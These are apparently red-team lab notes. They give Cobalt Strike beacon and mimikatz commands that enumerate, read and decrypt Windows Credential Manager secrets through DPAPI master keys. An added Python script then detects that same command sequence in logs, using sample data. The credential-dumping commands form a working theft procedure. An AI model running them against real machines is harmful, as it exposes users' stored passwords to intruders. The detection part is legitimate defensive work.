DPAPI
Credential Manager
# Location
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials
# OR
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
# OR
beacon> mimikatz vault::list
# Dump The Encrypted Data (pbData, guidMasterKey)
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7
# Get Master Key (Key)
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-3263068140-2042698922-2891547269-1120\a23a1631-e2ca-4805-9f2f-fe8966fd8698 /rpc
# Decrypting
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7 /masterkey:0c0105785f89063857239915037fbbf0ee049d984a09a7ae34f7cfc31ae4e6fd029e6036cde245329c635a6839884542ec97bf640242889f61d80b7851aba8df
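
A defender's view of the sequence above, as an added example that is not part of the original page: it tags lines of an assumed command log by stage, using the command strings and paths shown here, and reports the host and user pairs where the blob read, the master key request and the decryption all appear. The log layout, host names, second user and the blob, SID, GUID and key values are constructed.

```python
import re
from collections import defaultdict

# Most specific first: a decrypt line also contains the credential blob path.
STAGES = [
    ("decrypt", re.compile(r"dpapi::cred\b.*/masterkey:[0-9a-f]+", re.I)),
    ("masterkey", re.compile(r"dpapi::masterkey\b.*\\Microsoft\\Protect\\S-1-5-21-[\d-]+\\[0-9a-f-]{36}", re.I)),
    ("blob_read", re.compile(r"dpapi::cred\b.*\\Microsoft\\Credentials\\[0-9a-f]{32}", re.I)),
    ("enumerate", re.compile(r"vaultcmd\s+/listcreds|vault::list", re.I)),
]
KEY_VALUE = re.compile(r"(/masterkey:)[0-9a-f]+", re.I)

def classify(command):
    """Return the stage name for a command string, or None if nothing matches."""
    for stage, pattern in STAGES:
        if pattern.search(command):
            return stage
    return None

def scan(lines):
    """Parse 'timestamp host user command' lines (assumed layout) into events."""
    events = []
    for line in lines:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        stage = classify(parts[3])
        if stage:
            # Keep decrypted master key material out of the alert pipeline.
            command = KEY_VALUE.sub(r"\1<redacted>", parts[3])
            events.append(dict(ts=parts[0], host=parts[1], user=parts[2], stage=stage, command=command))
    return events

def full_chains(events):
    """Host/user pairs that show blob read, master key request and decryption."""
    seen = defaultdict(set)
    for e in events:
        seen[(e["host"], e["user"])].add(e["stage"])
    need = {"blob_read", "masterkey", "decrypt"}
    return sorted(key for key, stages in seen.items() if need <= stages)

# Constructed sample input: none of these values come from a real system.
BLOB = r"C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\0123456789ABCDEF0123456789ABCDEF"
MK = r"C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-1111111111-2222222222-3333333333-1001\00000000-0000-0000-0000-000000000001"
SAMPLE = [
    '2024-01-01T10:00:01Z WKSTN-1 bfarmer vaultcmd /listcreds:"Windows Credentials" /all',
    f"2024-01-01T10:00:09Z WKSTN-1 bfarmer mimikatz dpapi::cred /in:{BLOB}",
    f"2024-01-01T10:00:20Z WKSTN-1 bfarmer mimikatz dpapi::masterkey /in:{MK} /rpc",
    f"2024-01-01T10:00:31Z WKSTN-1 bfarmer mimikatz dpapi::cred /in:{BLOB} /masterkey:{'ab' * 64}",
    "2024-01-01T10:05:00Z WKSTN-2 jsmith vaultcmd /list",
]
```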